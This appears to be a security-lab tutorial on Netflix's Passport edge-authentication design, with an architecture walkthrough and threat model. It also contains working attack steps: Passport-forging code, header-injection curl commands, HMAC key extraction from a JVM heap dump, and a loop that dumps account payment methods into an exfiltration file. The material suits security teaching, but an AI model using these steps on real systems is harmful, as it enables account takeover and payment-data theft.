Authentication Architecture Security Labs in 2026
We wrote 17 deep-dive labs covering authentication architecture patterns from Netflix, Meta, Cloudflare, Stripe, Slack, Discord, Uber, and AWS.
Before we start, shoutout to a platform we built for YOU!
💎 Your next level in cybersecurity isn’t a dream, it’s a proactive roadmap.
HADESS AI Career Coach turns ambition into expertise:
→ 390+ clear career blueprints from entry-level to leadership
→ 490+ in-demand skill modules + practical labs
→ Intelligent AI(Not AI buzz, applied AI, promise!) tools + real-world expert coaches and scenarios
Master the skills that matter. Land the roles that pay. Build the future you want.
🔥 Start engineering your career →
https://career.hadess.io
Authentication Architecture Security Labs in 2026
We wrote 17 deep-dive labs covering authentication architecture patterns from Netflix, Meta, Cloudflare, Stripe, Slack, Discord, Uber, and AWS. Each lab examines a real production authentication system, maps chained attack paths from basic misconfiguration through full compromise, and gives you the secure configuration with verification.
The labs cover edge authentication (Netflix Passport identity propagation, Netflix MSL protocol for constrained devices), privacy-preserving authentication (Meta Anonymous Credential Service with VOPRFs, Meta Private Data Lookup with PSI, Cloudflare ARC anonymous rate limiting), modern credential formats (Meta Delegated Credentials for TLS, DPoP proof-of-possession RFC 9449, PASETO tokens), platform-specific auth (Stripe API key hierarchy, Slack token types where xoxp bypasses MFA, Discord Ed25519 interaction verification), zero trust architecture (Cloudflare Access + MASQUE, AWS Verified Access with Cedar policy language), workload identity (Uber SPIFFE/SPIRE), and customer-managed encryption (Slack EKM scope-based keys).
Every attack scenario chains from initial access through lateral movement to full compromise.
Lab 01: Netflix Passport Edge Authentication and Identity Propagation
Lab Reference
Field Value Lab ID AUTH-LAB-01 Title Netflix Passport Edge Authentication and Identity Propagation Category Authentication Architecture / Edge Identity Difficulty Advanced OWASP Reference ASVS V2: Authentication, V3: Session Management CVE References CVE-2024-1403 (Progress OpenEdge Authentication Bypass, CVSS 10.0) Tools curl, jq, protoc, Burp Suite, mitmproxy, Wireshark Environment Netflix Zuul edge gateway, internal microservices with Passport consumption
Writeup
Netflix routes all inbound traffic through a Zuul edge gateway cluster. Every external authentication token (MSL tokens from devices, HTTP cookies from browsers, OAuth tokens from partners) terminates at this gateway. None of these tokens propagate deeper into the service mesh. Instead, the gateway validates the external credential and generates an internal identity object called a Passport.
A Passport is a Protocol Buffers (protobuf) serialized structure containing two main sections: UserInfo and DeviceInfo. UserInfo holds the authenticated user’s identity (account ID, profile ID, authentication level). DeviceInfo holds device metadata (ESN, device type, client version). The entire protobuf payload is signed with HMAC-SHA256 using a symmetric key shared between the edge gateway and a verification library embedded in downstream services.
The architecture works through two main components on the Zuul gateway. The Passport Injection Filter intercepts every inbound request after external authentication succeeds. It strips any pre-existing Passport headers from the request (preventing external injection), resolves the caller’s identity from the validated external token, constructs the Passport protobuf, signs it with HMAC-SHA256, and attaches it as a binary header. Passport Actions handle upstream cookie resolution and token refresh operations that need to interact with the authentication systems on the way back out.
Before Passport existed, each of Netflix’s hundreds of microservices needed to understand and validate every external token format. A service processing a request from a smart TV needed MSL parsing logic. The same service handling a web request needed cookie validation logic. Every service was a potential authentication bypass surface. Passport collapses this sprawl into a single enforcement point at the edge.
The protobuf schema for Passport looks roughly like this:
message Passport {
message UserInfo {
string account_id = 1;
string profile_id = 2;
AuthLevel auth_level = 3;
int64 issued_at = 4;
repeated string entitlements = 5;
}
message DeviceInfo {
string esn = 1;
string device_type = 2;
string client_version = 3;
string ip_address = 4;
}
UserInfo user_info = 1;
DeviceInfo device_info = 2;
bytes hmac_signature = 3;
int64 expiration = 4;
}
The HMAC signature covers the serialized UserInfo and DeviceInfo fields. When a downstream service receives a request, it deserializes the Passport, recomputes the HMAC over the identity fields, and compares it to the attached signature. If the signature matches, the service trusts the identity claims without any further authentication checks.
This is the fundamental security tradeoff. Passport eliminates distributed authentication complexity but concentrates all identity trust in the edge gateway and the HMAC key. If an attacker compromises the HMAC key or the Zuul filter chain, they can forge Passports for any user and access any microservice as any identity.
The real-world parallel is CVE-2024-1403, a CVSS 10.0 authentication bypass in Progress OpenEdge. That vulnerability allowed attackers to bypass edge authentication entirely by manipulating the authentication handling logic at the gateway layer. The architectural pattern is identical: a single edge authentication point where a bypass gives access to everything behind it.
Netflix mitigates this through defense in depth that is not obvious from the public blog post but follows from the architecture. The HMAC key rotates on a schedule. Passports carry short expiration times measured in seconds, not minutes. The Zuul gateway runs in a hardened environment with restricted access. But the fundamental tension remains: the edge is a single point of failure for identity.
Passport Lifecycle
The full request lifecycle works as follows. A client sends a request with an external token to the Netflix edge. The Zuul gateway’s authentication filter validates the external token against the appropriate auth system (MSL key server for devices, cookie validation service for web, OAuth provider for partners). On successful validation, the Passport Injection Filter constructs a Passport protobuf, signs it, and replaces the external token with the Passport in the internal request headers. The request routes to the target microservice. The microservice deserializes the Passport, verifies the HMAC, checks the expiration, and extracts the identity claims. No microservice ever sees or handles the original external token.
Single Point of Enforcement
The Zuul gateway cluster typically runs dozens of filter chains in sequence. Authentication is one filter among many (rate limiting, routing, request decoration). A bug in filter ordering, a misconfigured filter chain, or a code deployment that accidentally removes the Passport Injection Filter can silently break the entire identity model. Requests would flow through without a valid Passport, and downstream services would either reject them (safe failure) or fall back to some default identity (catastrophic failure).
Security Considerations
HMAC Key as Crown Jewel: The symmetric HMAC-SHA256 key used for Passport signing is the single most sensitive secret in the architecture. Compromise of this key allows forging Passports for arbitrary users. The key must live in memory on every Zuul gateway instance, making it accessible to anyone with host-level access to the gateway fleet.
No Per-Service Verification Granularity: All services share the same HMAC key for Passport verification. There is no scoping mechanism where a payment service only accepts Passports with payment-level authentication, while a browse service accepts lower-level auth. The Passport is a flat identity assertion trusted uniformly.
Passport Header Injection: If the Zuul filter chain fails to strip pre-existing Passport headers from inbound requests, an external attacker can inject a pre-crafted Passport. The stripping logic must execute before any routing or processing occurs.
Expiration Window: Even with short expiration (seconds), a stolen valid Passport can be replayed within its validity window. The window must be short enough to limit replay but long enough to account for clock skew across the service mesh.
Protobuf Deserialization: Every downstream service deserializes untrusted protobuf data from the Passport header. Bugs in protobuf parsing libraries can lead to crashes or code execution. The protobuf payload should be size-limited and schema-validated.
Threat Model
+-----------------------+
| External Clients |
| (MSL, Cookies, OAuth) |
+-----------+-----------+
|
External tokens terminated here
|
+-----------v-----------+
| Zuul Edge Gateway |
| - Auth Filter |
| - Passport Injection |
| - HMAC Signing |
+-----------+-----------+
|
Passport (protobuf + HMAC)
|
+-----------------+------------------+
| | |
+--------v------+ +------v-------+ +--------v-------+
| Service A | | Service B | | Service C |
| (Streaming) | | (Billing) | | (Recommendations)|
| Passport | | Passport | | Passport |
| Verify + Use | | Verify + Use | | Verify + Use |
+---------------+ +--------------+ +----------------+
Threat 1: HMAC key compromise -> forge Passport for any user
Threat 2: Zuul filter bypass -> requests without valid Passport reach services
Threat 3: Passport header injection -> external attacker supplies crafted Passport
Threat 4: Passport replay within expiration window
Threat 5: Protobuf deserialization bugs in downstream services
Threat 6: Zuul gateway compromise -> full identity system takeover
Vulnerable Configuration
# Zuul gateway configuration - VULNERABLE defaults
zuul:
filters:
passport-injection:
enabled: true
# VULNERABLE: not stripping pre-existing Passport headers
strip-existing-passport: false
authentication:
enabled: true
passport:
hmac:
# VULNERABLE: static key, no rotation
key: "c2VjcmV0LWhtYWMta2V5LW5ldmVyLXJvdGF0ZWQ="
algorithm: HmacSHA256
expiration:
# VULNERABLE: 5-minute expiration is too long
seconds: 300
verification:
# VULNERABLE: downstream services skip verification
required: false
# Forging a Passport when HMAC key is known
import hmac
import hashlib
import struct
import time
from passport_pb2 import Passport # compiled protobuf
def forge_passport(hmac_key, target_account_id, target_profile_id):
passport = Passport()
passport.user_info.account_id = target_account_id
passport.user_info.profile_id = target_profile_id
passport.user_info.auth_level = 3 # highest auth level
passport.user_info.issued_at = int(time.time())
passport.device_info.esn = "NFANDROID2-PRV-FORGE"
passport.device_info.device_type = "android"
passport.device_info.client_version = "8.94.0"
passport.expiration = int(time.time()) + 300
# Sign with stolen HMAC key
payload = passport.user_info.SerializeToString() + \
passport.device_info.SerializeToString()
signature = hmac.new(
hmac_key.encode(),
payload,
hashlib.sha256
).digest()
passport.hmac_signature = signature
return passport.SerializeToString()
Attack Scenarios
Scenario 1: Passport Header Injection via Missing Strip Logic
An attacker discovers that the Zuul gateway does not strip pre-existing Passport headers from inbound requests. They craft a valid-looking Passport protobuf and send it directly, bypassing external authentication entirely.
# Step 1: Identify that the edge gateway is Zuul-based
curl -v https://api.target.com/health 2>&1 | grep -i "server\|x-zuul"
# Step 2: Probe whether Passport headers survive from external requests
# Craft a minimal Passport protobuf (base64-encoded)
FAKE_PASSPORT=$(python3 -c "
from passport_pb2 import Passport
p = Passport()
p.user_info.account_id = '999999999'
p.user_info.auth_level = 3
import base64
print(base64.b64encode(p.SerializeToString()).decode())
")
# Step 3: Send request with injected Passport header
curl -H "X-Netflix-Passport: $FAKE_PASSPORT" \
https://api.target.com/api/user/profile
# Step 4: If the service responds with account 999999999's profile data,
# the Passport was not stripped and not verified (unsigned but accepted)
Scenario 2: HMAC Key Extraction and Full Identity Forgery
An attacker chains multiple steps: initial access to a Zuul gateway host, HMAC key extraction from memory, and Passport forgery for lateral movement.
# Step 1: Gain initial access to Zuul gateway via SSRF or dependency exploit
# (e.g., Log4Shell in a Zuul filter dependency)
# Step 2: Extract HMAC key from JVM heap
# Zuul runs as a Java process; the HMAC key is in memory
jmap -dump:live,format=b,file=/tmp/zuul_heap.hprof $(pgrep -f zuul)
# Step 3: Search heap dump for HMAC key material
strings /tmp/zuul_heap.hprof | grep -A2 "HmacSHA256"
# Or use Eclipse MAT to find the PassportSigner object
# Step 4: With the HMAC key, forge Passports for any user
python3 forge_passport.py \
--hmac-key "extracted-key-here" \
--account-id "100000001" \
--auth-level 3 \
--output passport.bin
# Step 5: Use forged Passport to access internal services directly
# (attacker is now inside the network from Step 1)
curl -H "X-Netflix-Passport: $(base64 passport.bin)" \
http://billing-service.internal:8080/api/account/100000001/subscription
# Step 6: Enumerate high-value accounts
for ACCT in $(seq 100000001 100000100); do
curl -s -H "X-Netflix-Passport: $(python3 forge_passport.py \
--hmac-key "$KEY" --account-id "$ACCT" --raw)" \
http://billing-service.internal:8080/api/account/$ACCT/payment-methods \
>> exfil_data.json
done
